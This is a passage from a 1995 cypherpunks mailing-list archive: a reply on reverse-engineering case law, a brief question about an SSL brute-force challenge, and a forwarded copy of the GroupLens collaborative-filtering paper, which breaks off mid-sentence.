Content-Type: text/plain


> 
> On Wed, 26 Jul 1995, Russell Ross wrote:
> 
> > I wasn't aware that you could copyright an algorithm.  Patent, yes, but not
> > copyright.  Intellectual property meens secret, right?  Aren't there any
> > precendence cases involving propriety schemes that are reverse engineered?
> > I know there have been, I just can't remember what they are. 
> 
> There was one a few years back with a special chip in Nintendo cartridges 
> that you needed to buy from them... it was against a company called Atari 
> (no, not THAT atari (i think)), and was decided in Atari's favor.

There has only been one company called "Atari".  They did split between home
computers and video games/PC game software when Jack Tramiel left Commodore
and bought Atari.

I thought that it wasn't decided in Atari's favor, but maybe I didn't hear
the final word.  I believe that they used a form of rom access that they
had patented and restricted producers by only licensing roms to those
they wanted.

If I remember, it had something to do with address auto-increment.

I always wondered how the 'Game Genie' people got enough information
to do what they did.  (A true 'wedge' cartridge that you could program
codes into for all games to give extra lives, hard to find abilities,
change parameters, etc.)

> Hope that helps...
> Jon
> ------------------------------------------------------------------------------
> Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
>           Visit my home page at http://www.goucher.edu/~jlasser/
>   You have a friend at the NSA: Big Brother is watching. Finger for PGP key.

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Wed, 26 Jul 95 14:08:52 PDT
To: cypherpunks@toad.com
Subject: SSL challenge?
Message-ID: <9507262108.AA25550@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Where does the effort to bruteforce SSL stand?

I've got a bunch of P5/90s ready and waiting.


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 26 Jul 95 17:40:35 PDT
To: cypherpunks@toad.com
Subject: "grouplens": reputation system, groupware, etc.
Message-ID: <199507270038.RAA04789@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Hello cpunks, this strikes me as a very visionary proposal
for changing the underlying news infrastructure approach.
It refers to the idea of "ratings servers" (it would be
interesting to trace the origination of the term). I think the 
ideas are very malleable and may become a powerful force for 
future cyberspace communities. We are just now witnessing the
birth of reputation systems in cyberspace. I think they
will eventually become one of its most important features.

For any cpunks with interests in investing your time in 
world-changing technologies, this would be at the top of
*my* list. There are very difficult logistical problems
to overcome, but this "second generation of communication"
will IMHO be a key requirement of developing actual communities
in cyberspace.


~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html



X-within-URL: http://www-sloan.mit.edu/ccs/CCSWP165.html


    GROUPLENS: AN OPEN ARCHITECTURE FOR COLLABORATIVE FILTERING OF NETNEWS
                                       
   
   
   Paul Resnick*, Neophytos Iacovou**, Mitesh Suchak*, Peter Bergstrom**,
   John Riedl**
   
   
   * MIT Center for Coordination Science
   Room E53-325
   50 Memorial Drive
   Cambridge, MA 02139
   617-253-8694
   Email: presnick@mit.edu
   
   ** University of Minnesota
   Department of Computer Science
   Minneapolis, Minnesota 55455
   (612) 624-7372
   Email: riedl@cs.umn.edu
   
   From Proceedings of ACM 1994 Conference on Computer Supported
   Cooperative Work, Chapel Hill, NC: Pages 175-186
   
   Copyright (c)1994, Association for Computing Machinery
     _________________________________________________________________
   
   ABSTRACT
   
   Collaborative filters help people make choices based on the opinions
   of other people. GroupLens is a system for collaborative filtering of
   netnews, to help people find articles they will like in the huge
   stream of available articles. News reader clients display predicted
   scores and make it easy for users to rate articles after they read
   them. Rating servers, called Better Bit Bureaus, gather and
   disseminate the ratings. The rating servers predict scores based on
   the heuristic that people who agreed in the past will probably agree
   again. Users can protect their privacy by entering ratings under
   pseudonyms, without reducing the effectiveness of the score
   prediction. The entire architecture is open: alternative software for
   news clients and Better Bit Bureaus can be developed independently and
   can interoperate with the components we have developed.
   
   KEYWORDS: Collaborative filtering, information filtering, electronic
   bulletin boards, social filtering, Usenet, netnews, user model,
   selective dissemination of information.
   
   INTRODUCTION
   
   Computer networks allow the formation of interest groups that cross
   geographical barriers. Bulletin boards have been an important
   mechanism for that. Rather than addressing an article directly to a
   known set of people, the writer posts it in a newsgroup, a public
   place available to anyone interested in the topic. The Usenet netnews
   system creates the illusion of a single bulletin board available
   anywhere in the world. It propagates articles so that, with some
   delays, an article posted from anywhere in the world is available to
   everyone else.
   
   Permission to copy without fee all or part of this material is granted
   provided that the copies are not made or distributed for commercial
   advantage, the ACM copyright notice and the title of the publication
   and its date appear, and notice is given that copying is by permission
   of the Association for Computing Machinery. To copy otherwise, or to
   republish, requires a fee and/or specific permission.
   
   Recent counts indicate that there are more than 8000 newsgroups, with
   an average traffic of more than 100 MB per day[1]. The newsgroups
   carry announcements, questions, and discussions. In a discussion,
   often called a thread, one article induces replies from several
   others, each of which may also induce replies. The January 24, 1994
   estimates of netnews participation indicate that more than 140,000
   people posted articles in the previous two weeks. There are many more
   "lurkers" who read but do not post articles. Clearly, a lot of people
   are getting value from these bulletin boards.
   
   In fact, netnews' rapid broadcast nature and widespread readership has
   reshaped the way the computing community works. System administrators
   depend on netnews to keep in touch with the latest development work,
   the latest security holes, and the latest bug fixes. Researchers
   depend on netnews as a way of keeping up-to-date on new research
   directions and important results in between conferences. Many others
   use netnews just to keep in touch with other people around the world,
   to learn about new books, new recipes, new music, and what life in
   other cities is like. Over the years netnews has become a principal
   medium for sharing among computer users.
   
   Even so, the experience of using netnews is not completely satisfying.
   Almost everyone complains that the signal to noise ratio is too low.
   Writers cannot easily tell whether their comments are valued, except
   by the vocal few who post responses. Some seem not to care about
   reader interest, only about their own right to write. Moreover, tastes
   differ, so that no one article will appeal to all the readers of a
   newsgroup. Each reader ends up sifting through many news articles to
   find a few valuable ones. Often, readers find the process too
   frustrating and stop reading netnews altogether.
   
   Netnews provides two mechanisms that help readers limit their
   attention to articles likely to interest them. First, the division of
   the bulletin board into newsgroups allows readers to focus on a few
   topics. When the number of postings in a newsgroup gets too large, it
   is often split into two or more newsgroups with identifiable
   subtopics. Second, some newsgroups are moderated. Attempted postings
   to these newsgroups are automatically forwarded to the moderator, who
   decides whether or not they belong in the newsgroup. Usenet propagates
   only those articles that receive the moderator's stamp of approval.
   
   In addition, software packages for reading netnews (hereafter referred
   to as news clients) provide other mechanisms that ease readers'
   burdens. First, most news clients display a summary of the author and
   subject line for each message in a newsgroup. The user then indicates
   which articles she would like to read. Second, most news clients
   display all of the articles in a particular discussion thread
   together. Some initially show only the first article in each thread,
   allowing users to quickly peruse the current discussion topics. Third,
   some news clients provide "kill files." A kill file identifies text
   strings that are not interesting to a particular user. If a user puts
   the subject line of an article into the kill file, no further articles
   on that subject will be displayed. If a user puts the author's name
   into a kill file, no further articles from that author will be
   displayed. Finally, some news readers provide string search
   facilities. If the user is particularly interested in articles that
   mention "collaborative filtering," the news client can find them.
   
   GroupLens provides a new mechanism to help focus attention on
   interesting articles. It draws on a deceptively simple idea: people
   who agreed in their subjective evaluation of past articles are likely
   to agree again in the future. After reading articles, users assign
   them numeric ratings. GroupLens uses the ratings in two ways. First,
   it correlates the ratings in order to determine which users' ratings
   are most similar to each other. Second, it predicts how well users
   will like new articles, based on ratings from similar users. The heart
   of GroupLens is an open architecture that includes news clients for
   entry of ratings and display of predictions, and rating servers for
   distribution of ratings and delivery of predictions.
   
   Related Work
   
   The general problems of information overload and low signal to noise
   ratio have received considerable attention in the research literature.
   We use the term information filtering generically to refer both to
   finding desired information (filtering in) and eliminating that which
   is undesirable (filtering out), but related work also appears under
   the labels of information retrieval and selective dissemination of
   information [2]. In addition, research on agents [12, 13], user
   modeling [1, 9], knowbots [8], and mediators [21] has explored
   semi-autonomous computer programs that perform information filtering
   on behalf of a user.
   
   Malone et al. [13] describe three categories of filtering techniques,
   cognitive, social, and economic, based on the information sources the
   techniques draw on in order to predict a user's reaction to an
   article. The three categories provide a useful road map to the
   literature.
   
   Cognitive, or content-based filtering techniques select documents
   based on the text in them. For example, the kill files and string
   search features provided by news clients perform content filtering.
   Even the division of netnews into newsgroups is a primitive example,
   since a reader restricts his attention to those articles with a
   particular text string in their "newsgroup:" field.
   
   Other content-based filtering techniques could potentially be used as
   well. The profile of which texts to include or kill could be more
   complex than a collection of character strings. For example, strings
   could be combined with the Boolean operators AND, OR, and NOT.
   Alternatively, the profile could consist of weight vectors, with the
   weights expressing the relative importance of each of a set of terms
   [4, 5, 16].
   
   Some content filtering techniques update the profiles automatically
   based on feedback about whether the user likes the articles that the
   current profile selects. Information retrieval research refers to this
   process as relevance feedback [17]. The techniques for updating can
   draw on Bayesian probability [2], genetic algorithms [18], or other
   machine learning techniques.
   
   Social filtering techniques select articles based on relationships
   between people and on their subjective judgments. Placing an author's
   name in a kill file is a crude example. More sophisticated techniques
   might also filter out articles from people who previously co-authored
   papers with the objectionable person.
   
   Collaborative filtering, based on the subjective evaluations of other
   readers, is an even more promising form of social filtering. Human
   readers do not share computers' difficulties with synonymy, polysemy,
   and context when judging the relevance of text. Moreover, people can
   judge texts on other dimensions such as quality, authoritativeness, or
   respectfulness. A moderated newsgroup employs a primitive form of
   collaborative filtering, choosing articles for all potential readers
   based on evaluations by a single person, the moderator.
   
   The Tapestry system [6] makes more sophisticated use of subjective
   evaluations. Though it was not designed to work specifically with
   netnews, it allows filtering of all incoming information streams,
   including netnews. Many people can post evaluations, not just a single
   moderator, and readers can choose which evaluators to pay attention
   to. The evaluations can contain text, not just binary accept/reject
   recommendations. Moreover, filters can combine content-based criteria
   and subjective evaluations. For example, a reader could request
   articles containing the word "CSCW" that Joe has evaluated and where
   the evaluation contains the word, "excellent".
   
   Our work is similar in spirit to Tapestry but extends it in two ways.
   First, Tapestry is a monolithic system designed to share evaluations
   within a single site. We share ratings between sites and our
   architecture is open to the creation of new news clients and rating
   servers that would use the evaluations in different ways. Second,
   Tapestry does not include any aggregate queries. The rating servers we
   have implemented aggregate ratings from several evaluators, based on
   correlation of their past ratings. A reader need not know in advance
   whose evaluations to use and in fact need not even know whose
   evaluations are actually used. In GroupLens, ratings entered under a
   pseudonym are just as useful as those that are signed.
   
   Maltz has developed a system that aggregates all ratings of each
   netnews article, determining a single score for each [14]. By
   contrast, GroupLens customizes score prediction to each user, thus
   accommodating differing interests and tastes. In return for its
   reduced functionality, Maltz's scheme scales better than ours, because
   rating servers can exchange summaries of several users' ratings of an
   article, rather than individual ratings.
   
   The subjective evaluations used in collaborative filtering may be
   implicit rather than explicit. Read Wear and Edit Wear [7] guide users
   based on other users' interactions with an artifact. The GroupLens
   news clients monitor how long users spend reading each article but our
   rating servers do not yet use that information when predicting scores.
   
   
   Economic filtering techniques select articles based on the costs and
   benefits of producing and reading them. For example, Malone argues
   that mass mailings have a low production cost per addressee and should
   therefore be given lower priority. Applying this idea to netnews, a
   news client might filter out articles that had been cross-posted to
   several newsgroups. More radical schemes could provide payments (in
   real money or reputation points) to readers to consider articles and
   payments to producers based on how much the readers liked the
   articles.
   
   Stodolsky has proposed a scheme that combines social and economic
   filtering techniques [19]. He proposes on-line publications where the
   publication decision ultimately rests with the author. During a
   preliminary publication period, other readers may post ratings of the
   article. The author may then withdraw the article, to avoid the cost
   to his reputation of publishing an article that is disliked.
   
   Outline
   
   The GROUPLENS section of the paper describes the GroupLens
   architecture and its evolution. The ONGOING EXPERIMENTATION section
   describes a larger scale test of the architecture that is in
   preparation. The SOCIAL IMPLICATIONS section addresses social changes
   in the use of Netnews that may be precipitated by GroupLens.
   
   GROUPLENS
   
   GroupLens is a distributed system for gathering, disseminating, and
   using ratings from some users to predict other users' interest in
   articles. It includes news reading clients for both Macintosh and Unix
   computers, as well as "Better Bit Bureaus," servers that gather
   ratings and make predictions. Both the overall architecture and
   particular components have evolved through iterative design and pilot
   testing to meet the following goals:
   
   Openness: There are currently dozens of news clients in common use,
   each with a strong following among its user community. Any or all of
   these clients can be adapted to participate in GroupLens. GroupLens
   also allows for the creation of alternative Better Bit Bureaus that
   use ratings in different ways to predict user interest in news
   articles.
   
   Ease of Use: Ratings are easy to form and communicate, and predictions
   are easy to recognize and interpret. This minimizes the additional
   burden that collaborative filtering places on users.
   
   Compatibility: The architecture is compatible with existing news
   mechanisms. Compatibility reduces user overhead in taking advantage of
   the new tool, and simplifies its introduction into netnews.
   
   Scalability: As the number of users grows, the quality of predictions
   should improve and the speed not deteriorate. One potential limit to
   growth will be transport and storage of the ratings, if GroupLens
   grows very large.
   
   Privacy: Some users would prefer not to have others know what kinds of
   articles they read and what kinds they like. The Better Bit Bureaus in
   GroupLens can make effective use of ratings even if they are provided
   under a pseudonym.
   
   Overview
   
   Usenet consists of Internet sites as well as UUCP sites. Typically a
   site will declare a machine to act as its news server. Users at each
   site invoke news clients on their computers and connect to the news
   server in order to retrieve news articles. Users can also write new
   articles and post them to the news server through their news clients.
   
   When a user posts an article, it travels from the news client where
   the article is composed to the local news server and from there to
   news servers at nearby sites. After leaving the originating site, an
   article propagates throughout Usenet, hopping from site to site. Since
   there is no centralized coordination of the distribution process, an
   article may arrive at a site via more than one route. Because articles
   have globally unique identifiers, however, and are never altered once
   they are posted, any site can recognize a duplicate copy of an article
   and avoid passing it on. Lotus Notes uses a similar distribution
   process [10]. The netnews architecture is summarized in Figure 1.
   
   GroupLens adds one new type of entity to the netnews architecture,
   Better Bit Bureaus, as shown in Figure 2. The Better Bit Bureaus
   provide scores that predict how much the user will like articles, and
   gather ratings from news clients after the user reads the articles.
   The Better Bit Bureaus also use special newsgroups to share ratings
   with each other, to allow collaborative filtering among users at
   different sites. The remainder of this section traces the processes of
   rating creation, distribution, and use and describes how they meet
   
   [IMAGE]
   
   Figure 1: The netnews architecture. News articles hop from news server
   to news server. A news client connects to the news server at its site
   and presents articles to users. [INLINE]
   
   Figure 2: The GroupLens architecture. Better Bit Bureaus collect
   ratings from clients, communicate them by way of news servers, and use
   them to generate numeric score predictions that they send to clients.
   Clients connect to a local news server, and can connect to a Better
   Bit Bureau that uses the same or a different news server.the design
   goals of openness, ease of use, compatibility, scalability, and
   privacy.
   
   Entering Ratings
   
   In GroupLens, a rating is a number from 1 to 5, optionally
   supplemented by the number of seconds which the user spent reading the
   article. Users are encouraged to assign ratings based on how much they
   liked the article, with 5 highest and 1 lowest. The user chooses a
   pseudonym to associate with her ratings that may be different from the
   name she uses for posting news articles. This preserves the ability to
   detect that two ratings came from the same person, while preventing
   detection of exactly who that person is.
   
   The GroupLens choice of the form and meaning of ratings is only one
   possibility in a rich design space. There are many possible dimensions
   along which to rate articles: interest in subject, quality of writing,
   authoritativeness of the author, etc. Rather than a single composite
   rating, separate ratings on several dimensions could be solicited from
   readers. Free text ratings could be entered rather than numbers.
   Readers could be asked to predict how well they think other readers
   will like an article rather than report how much they themselves liked
   it. Ratings could be restricted only to positive, or only to negative
   evaluations. The degree of privacy could also be varied, from
   completely anonymous to authenticated signatures.
   
   In fact, an earlier implementation of a Macintosh news client [20]
   employed ratings with quite a different form than the current
   GroupLens architecture. Users entered only endorsements, positive
   ratings, on the assumption that since the signal to noise ratio in
   netnews is so low it is only important to point out the good articles.
   Readers endorsed articles that they thought others in a known small
   group would like. Finally, readers signed endorsements with their real
   names, allowing other people to select all the articles endorsed by a
   particular friend.
   
   A pilot test of that earlier endorsement mechanism at a Schlumberger
   research lab indicated that a group of seven people may not be large
   enough to get the full available benefit of collaborative filtering.
   As we contemplated a much larger group size, we believed that some
   users would be less willing to sign their ratings and that it would
   become increasingly difficult for users to know what articles others
   in the group would like.
   
   The pilot test also reinforced the importance of making it as easy as
   possible to enter endorsements. To make an endorsement, a user had to
   select from a pull-down menu, wait for a window to open up, optionally
   enter text in the window, and then close it. While the whole process
   took only a matter of seconds if the user entered no text, it was
   still significantly longer than it normally takes to go on to the next
   article.
   
   We have taken care in the GroupLens system to make entry of ratings as
   easy as possible. We have modified three news clients, Emacs Gnus and
   NN for UNIX machines and NewsWatcher for Macintoshes. In each case,
   entry of a
   
   [IMAGE]
   
   Figure 3. Reading an article with the modified NewsWatcher client. The
   user can click on one of the five ratings buttons with the mouse, or
   type a number from 1 to 5 on the keyboard.
   
   rating fits into the overall paradigm of the news client. For example,
   in the modified NewsWatcher, the numbers 1 to 5 appear as selectable
   buttons any time a user reads an article (Figure 3), and the user can
   also type a number as a keyboard shortcut for those buttons. In Gnus,
   no buttons are displayed, but readers still type the ratings directly.
   With NN, readers first type the letter `v' (to enter into "rating
   mode") and then the rating.
   
   The GroupLens architecture requires only that ratings be reported on a
   1 to 5 scale, not that they be displayed by news clients on that
   scale. To make the rating scale easy for students to understand, the
   NN and Gnus clients accept letter grades rather than numbers. When
   reporting the ratings to the Better Bit Bureau, they translate `a' to
   5, `b' to 4 and so on. Other news clients could allow more gradations
   of ratings (e.g., 1 to 100) and report them as fractions between 1 and
   5.
   
   Distributing Ratings
   
   GroupLens does not interfere with the Usenet propagation scheme at
   all. On the contrary, it relies upon it heavily. The Better Bit Bureau
   packages one or more ratings into a news article, following the format
   in Figure 4, and posts it to a news server. This allows GroupLens to
   take advantage of the Usenet propagation scheme. Over the years Usenet
   has demonstrated its ability to propagate articles to every other
   Usenet site, even as the number of news servers has grown
   dramatically. Rating servers could exchange ratings directly, through
   internet or UUCP links, but they would have to reimplement many of the
   propagation features already found in Usenet.
   
   The message format we have defined allows several ratings to be
   batched in a single article. Each rating is just one line of text,
   while each Usenet netnews article requires several lines of headers.
   Thus, packaging several ratings in one article can save a considerable
   amount of overhead. Our Better Bit Bureaus (BBBs) batch at the session
   level (i.e., all ratings entered by a user during a reading session go
   into one ratings article). Other batching policies, such as all
   ratings from a site over the last hour, could be implemented.
   
   Ratings are posted in newsgroups dedicated solely to ratings articles.
   One natural configuration is to set up a parallel "ratings transport"
   newsgroup for each "normal" Usenet group. One deficiency of this
   approach is that if a rating article contains several ratings, it may
   have to be cross-posted to many ratings newsgroups. Another deficiency
   is that it requires news servers to carry a large number of new
   newsgroups devoted solely to ratings, which may increase
   administrative overhead. Currently, our BBBs post all ratings in a
   single newsgroup.
   
   To facilitate the initial spread of GroupLens, users can participate
   even if their local news servers do not carry the ratings newsgroup
   and even if their local site administrators have not set up Better Bit
   Bureaus. The GroupLens architecture permits this by allowing users to
   connect to a remote BBB. The left side of Figure 2 illustrates a local
   BBB that posts ratings articles to the same news server that the
   clients connect to. The right side of Figure 2 illustrates a client
   connecting to a remote BBB that propagates ratings articles through a
   different news server.
   
   Predicting Scores 
   
   The Better Bit Bureaus (BBBs) predict how much readers will like
   articles. While content filters would make predictions based on the
   presence or absence of words in the articles, the BBBs in GroupLens
   use the opinions of other people who have already rated the articles.
   If no one has read an article, the BBBs are unable to make predictions
   about it.
   
   When ratings for an article are available, they are unlikely to be
   uniform, due to differences of opinion and goals among the raters. A
   BBB combines the different ratings to produce a predicted score.
   Moreover, additional readers are likely to have different opinions
   about the article. A BBB thus might use the same ratings to predict
   different scores for different readers, by changing the relative
   weight given to the ratings.
   
   When predictions are on the same scale as ratings, prediction can be
   modeled as matrix filling, where the columns are people, the rows are
   articles, and the cells contain the ratings that people have posted,
   as shown in Figure 5. Many of the cells of the matrix are empty,
   because readers have not yet examined those articles or have elected
   not to rate them. A BBB predicts scores for missing cells before the
   readers examine the corresponding articles.
   
   
   
   From: MIT GroupLens Better Bit Bureau
   
   Subject: Ratings; please ignore
   
   Message-ID: <771185369@guilder.mit.edu>
   
   Groups_Rated: news.adin.policy, news.groups
   
   Raters: [Pseudo1]
   
   
   
   <MATT.94May19124319@physics5.berkeley.edu> [Pseudo1] 1 12
   news.adin.policy
   
   <fred_sCq2FF6.Mtt@netcom.com> [Pseudo1] 2 7 news.groups
   
   
   
   Figure 4: A sample ratings article. Each line in the body of the
   article contains a rating of one article by one person. The five
   fields on each line are the id of the article, the pseudonym of the
   rater, a rating, the number of seconds the reader spent examining the
   article before rating it, and the newsgroups the article is in. The
   time count is optional. Additional keyword identified fields can also
   be included at the end of line.
   
   [IMAGE]
   
   Figure 5: a sample matrix of ratings.
   
   All the scoring methods we have implemented are based on the heuristic
   that people who agreed in the past are likely to agree again, at least
   on articles in the same newsgroup. This heuristic will mislead on
   occasion, but preferences for most kinds of articles are likely to be
   fairly stable over time.
   
   To implement this heuristic, our BBBs first correlate ratings on
   previous articles to determine weights to assign to each of the other
   people when making predictions for one of them. Then, they use the
   weights to combine the ratings that are available for the current
   article. We have investigated several techniques for correlating past
   behavior and using the resultant weights, based on reinforcement
   learning [12], multivariate regression, and pairwise correlation
   coefficients that minimize linear error or squared error.
   
   We illustrate one of the correlation and prediction techniques by
   computing Ken's predicted score on article 6, the last row of the
   matrix. First, we compute correlation coefficients [15], weights
   between -1 and 1 that indicate how much Ken tended to agree with each
   of the others on those articles that they both rated. For example,
   Ken's correlation coefficient with Lee is computed as:
   
   [IMAGE]
   
   In the formula above, [INLINE] is the average of Ken's ratings. All
   the summations and averages in the formula are computed only over
   those articles that Ken and Lee both rated. We have conveniently
   arranged for [INLINE] and [INLINE] to be 3 in this example, but that
   need not be true in practice.
   
   Similarly, Ken's correlation coefficient with Meg is +1 and with Nan
   is 0. That is, Ken tends to disagree with Lee ( [INLINE] ) and agree
   with Meg ( [INLINE] ). His ratings are not correlated with Nan's.
   
   To predict Ken's score on the last article in the matrix, take a
   weighted average of all the ratings on article 6 according to the
   following formula:
   
   [IMAGE]
   
   This is a reasonable prediction for Ken, since the article received a
   high rating from someone who agreed with him in the past and a low
   rating from someone who disagreed. Carrying through similar
   calculations for Nan yields a lower prediction of 3.75. Since Nan had
   partial agreement with Lee in the past, Lee's low rating for the
   article partially cancels out the high ratings that Meg gave it.
   
   The score prediction system is robust with respect to certain
   differences of interpretation of the rating scale. If two users are
   perfectly correlated, but one user gives only scores between 3 and 5
   and the other only scores between 1 and 3, a 5 score from the first
   user will result in a prediction of 3 for the second. If two users
   would be perfectly correlated, but the first mistakenly thinks 1 is a
   good score and 5 is bad, the two will be negatively correlated and a 1
   score from the first will result in a prediction of 5 for the second.
   This leads to a clear explanation to the user of how to assign
   ratings: assign the rating you wish GroupLens had predicted for this
   article.
   
   Allen's study of five subjects' preferences for newswire articles [1]
   found very small correlations between subjects, thus calling into
   question our basic assumption that people who agreed in the past are
   likely to agree again. It may be, however, that a larger sample of
   subjects would have yielded some pairs with larger overlaps in their
   ratings. More importantly, it may be that pairs of people will share
   interests in some topics but not others. Two people may agree in their
   evaluations of technical articles, but not jokes. Our BBBs keep
   separate rating matrices for each newsgroup.
   
   One hopes that the accuracy of the predictions improve as the BBB has
   more past ratings to use in computing correlations. Four people at the
   University of Minnesota participated in a pilot test of an earlier
   version, using a slightly different scoring function. While all four
   participants reported that the predicted scores eventually matched
   their interests fairly closely, they did observe that there was a
   start-up interval before the predictions were very useful. Further
   experiments and analysis are necessary to determine just how long the
   start-up interval is likely to be for each new user.
   
   It seems likely that better scoring mechanisms can be developed. In
   addition to better matrix filling techniques, it may be helpful to use
   both others' ratings and the contents of articles in making
   predictions. It may also be helpful to take into account the time
   people spent reading articles before rating them, information
   collected but not used by our BBBs.
   
   Fortunately, the GroupLens architecture is open: anyone can implement
   an alternative BBB so long as it posts ratings articles in the format
   described above and communicates with clients the same way that our
   BBBs do. We hope that the development of alternative BBBs will become
   an active area for future research. As we describe below, our next
   pilot test should yield rating sets that we will make available to
   others who wish to evaluate alternative scoring algorithms.
   
   Using Ratings
   
   It is up to the news client how best to use the scores generated by a
   BBB. Some may filter out those articles with scores below a threshold.
   Some may sort the articles based on the scores. Others may simply
   display the scores, numerically or graphically. In keeping with the
   ease of use design goal, developers should modify each news client in
   a manner consistent with that client's overall design.
   
   One trend in news clients is to display a summary of the unread
   articles in a newsgroup. Each line of the summary contains information
   about one article, typically the author, the subject line and the
   length. A user browses the summary and requests display of the full
   text of those articles that seem interesting. All three of the news
   clients we modified use this display technique.
   
   The three modified clients we implemented make slightly different uses
   of the scores in the summary display. The modified NN client displays
   articles in the same order a regular NN client does, namely the order
   in which the articles arrived at the news server. It merely adds an
   additional column containing the predicted scores. In the first
   version of this client, the scores were displayed numerically.
   
   The modified Gnus client uses the predicted scores to alter the order
   of presentation of articles in the summary. Gnus clusters articles by
   thread. The modified Gnus client sorts the threads based on the
   maximum predicted score over the articles in the thread. Within each
   thread, however, articles are still displayed in chronological order,
   to preserve the flow of discussion. As in the modified NN, the scores
   are displayed in an additional column in the summary.
   
   The Minnesota pilot test included users of both the Gnus and NN
   clients. As expected, participants tended to believe that the sorting
   and display mechanisms of their own news reader were best, but all
   were glad to see the score predictions incorporated into that standard
   format.
   
   Several users, however, noticed that it was somewhat difficult to
   visually scan the predictions to find the high ones. A revised version
   of the NN client (Figure 6) rounds off to the nearest integer and
   reports that as a letter grade (A-E), a scale familiar to students at
   U.S. Universities.
   
   The modified NewsWatcher client displays the predicted scores as bar
   graphs rather than numbers (Figure 7), making it easier to visually
   scan for articles with high scores (longer bars). Otherwise, it
   follows the conventions of the original NewsWatcher client. Articles
   are grouped into threads and the summary display initially shows
   header lines only for the first article in each thread. Users can
   twist down the triangle associated with a thread to see the header
   lines for the rest of the articles.
   
   
   
   [IMAGE]
   
   Figure 6: The modified NN client. The third column displays the number
   of lines in the article. The fourth column displays the score
   predictions as letter grades, translated from the numeric predictions
   that the Better Bit Bureau makes (5=A, 4=B, etc.). When no one has
   evaluated an article, no prediction is made.
   
   [IMAGE]
   
   Figure 7: The modified NewsWatcher client displays predicted scores as
   bar graphs. Disclaimer: the scores were randomly generated for
   demonstration purposes. In practice, we would expect articles by Pete
   Bergstrom (one of the authors of this paper) to have much higher
   predicted scores.
   
   Scale Issues
   
   Further research is needed to understand how performance will change
   as the scale increases. In the case of GroupLens, there are several
   relevant performance measures: prediction quality, user time, Better
   Bit Bureau compute time and disk storage, and network traffic.
   
   The first measure is the quality of score predictions. We expect
   prediction quality to increase as the number of users increases, since
   more data will be available to the prediction algorithm.
   
   Another measure is how long users have to wait to post ratings and
   receive predictions. In an earlier version of GroupLens, the functions
   of the BBB were incorporated in the news client itself. One major
   advantage of the separate BBB is that it can pre-fetch ratings and
   pre-compute predictions rather than computing them when the user
   starts the news client. Thus, user time should remain roughly constant
   as GroupLens grows, even if it takes more CPU time to compute scores.
   
   For many possible prediction formulas CPU time will grow even faster
   than linearly with increases in the number of users. To reduce CPU
   time, BBBs could use only a part of the ratings matrix, trading off
   compute time against quality of predictions.
   
   Even though each rating is short, each news article might be read and
   rated by many raters, so the total volume of ratings could exceed the
   volume of news. To minimize storage requirements, BBBs may employ
   algorithms that use and discard ratings as they arrive, rather than
   storing them.
   
   Three basic techniques could reduce network traffic: reduce the size
   of the ratings, reduce the number of ratings, and reduce the number of
   places where each rating is sent. Our BBBs batch several ratings in a
   single article, a first step toward reducing the amount of storage per
   rating, but further compression is possible. The number of ratings
   could be reduced by limiting the total number of ratings per article
   or the number of ratings from users with similar profiles.
   
   The separation of the BBBs from the news clients in the GroupLens
   architecture reduces the number of destinations for each rating: each
   news client receives only score predictions rather than all the
   individual ratings that contribute to those predictions.
   
   The number of destinations for each rating could be further reduced by
   sending ratings to some BBBs but not others. For example, BBBs could
   be clustered, based on geography or interest, and exchange ratings
   only within clusters. The size of each cluster must be small enough to
   limit the amount of ratings information distributed, but large enough
   to provide an effective peer group. The table below estimates daily
   network traffic for various cluster sizes assuming each user rates 100
   articles per day and each rating requires approximately 100 bytes. For
   comparison purposes, the current netnews traffic is around 100MB per
   day.

Cluster size     Daily ratings
                 traffic
100 users        1 MB
10,000 users     100 MB
1,000,000 users  10 GB

   
   
   Summary of GroupLens Architecture
   
   The heart of GroupLens is an open architecture for distributing
   ratings. The architecture specifies the format of ratings produced in
   batches by BBBs, the propagation of the ratings by Usenet, and the
   interface for delivering predictions and ratings between news clients
   and BBBs. Otherwise, the architecture is completely open. BBBs and
   news clients can be freely substituted, providing an environment for
   experimentation in predicting ratings and in user interfaces for
   collecting ratings and presenting predictions.
   
   ONGOING EXPERIMENTATION 
   
   Both of the previous pilot tests, at Schlumberger and the University
   of Minnesota, involved only local sharing of ratings. These tests led
   to improvements in both the overall architecture and the user
   interfaces of news clients, as discussed already. The next step is a
   larger scale, distributed test, that we plan to carry out this summer.
   We have established a newsgroup on the news servers at MIT and
   Minnesota and two (slightly different) Better Bit Bureaus that
   communicate ratings through that newsgroup.
   
   The test is not designed to demonstrate that people prefer to read
   netnews with our collaborative filters than without them. We believe
   that such an evaluation should wait for at least one more iterative
   design cycle. Rather, the goals are to identify any unexpected scaling
   issues that may arise and to gather a data set that will be useful in
   evaluating alternative score prediction algorithms.
   
   The primary benchmark of any algorithm's effectiveness will be its
   ability to predict values that have been deleted from a rating matrix.
   At first glance, it might seem that any large set of ratings would be
   useful in creating such a benchmark. Upon closer inspection, however,
   complete ratings matrices are much more valuable than sparse ones. For
   example, suppose that users read and rate only a small number of
   articles, based on score predictions they receive from BBB X. If users
   read different articles, this generates a sparse matrix of ratings.
   Now suppose that we wish to compare X to an alternative, Y, that
   predicts different scores for the users. We can compare Y's and X's
   predictions on those articles that users read, but the sample is
   biased. Perhaps with Y's scores, the users would have read other
   articles and liked them.
   
   To allow unbiased comparisons, we are asking each of the participants
